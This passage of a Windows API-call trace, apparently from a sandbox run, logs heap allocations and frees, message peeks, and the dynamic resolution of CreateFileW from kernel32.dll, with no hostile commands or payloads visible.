Flags=0x0, Size=0x10) returned 0x43ca658 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0108.302] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0108.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0108.302] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0108.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0108.302] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0108.302] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2780 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0108.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2810 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0108.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2840 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0108.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0108.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0108.303] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0108.303] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0108.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0108.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0108.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391af0 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0108.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0108.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0108.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0108.304] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0108.304] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0108.305] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0108.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0108.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0108.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0108.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0108.305] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0108.305] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0108.306] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.306] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0108.307] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0108.307] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0108.307] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0108.308] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.308] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.309] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0108.309] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0108.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0108.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0108.310] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0108.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7f0 [0108.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca7f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0108.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0108.310] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0108.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0108.310] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0108.310] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0108.311] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0108.311] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 